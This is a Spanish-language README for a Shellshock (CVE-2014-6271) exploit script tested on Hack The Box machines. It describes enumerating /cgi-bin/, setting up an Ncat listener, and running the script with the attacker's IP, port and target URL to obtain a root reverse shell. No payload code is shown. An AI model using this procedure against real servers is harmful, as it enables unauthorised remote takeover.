
Exploit Shellshock, también conocido como CVE-2014-6271
Exploit de Shellshock, también conocido como CVE-2014-6271.
Probado en Bash 3.2 y Bash 4.2.
Para más información sobre la vulnerabilidad visita: https://nvd.nist.gov/vuln/detail/CVE-2014-6271
El exploit se probó principalmente en Hack The Box en las siguientes máquinas:
Beep: https://app.hackthebox.eu/machines/BeepShocker: https://app.hackthebox.eu/machines/ShockerDe lo contrario, si obtienes un 403 en el directorio /cgi-bin/, intenta enumerar archivos
dentro de ese directorio con una buena wordlist, buscando extensiones .sh o .cgi.
NOTA: No olvides configurar tu listener TCP, de lo contrario el exploit podría darte
un falso positivo durante la verificación de la llamada testRevShell
Primero podemos ver los argumentos que acepta el exploit ejecutando: shellshock.py -h
Luego podemos configurar un listener de Ncat en un puerto de nuestra elección, aquí elegí el 45
A continuación, podemos ejecutar el exploit proporcionando todos los argumentos que requiere ejecutando:
shellshock.py [NUESTRA_IP] [NUESTRO_PUERTO_DE_ESCUCHA] [URL_OBJETIVO]
La URL objetivo aquí, como se puede ver, es donde el servidor web envía una solicitud POST durante la autenticación en esa máquina.
Aquí, como vemos en la salida, el exploit intentó enviar el payload a través de SSL usando múltiples versiones de TLS, hasta que tuvo éxito.
¡Y aquí tenemos nuestra reverse shell! Por suerte, el servidor web se ejecutaba como root.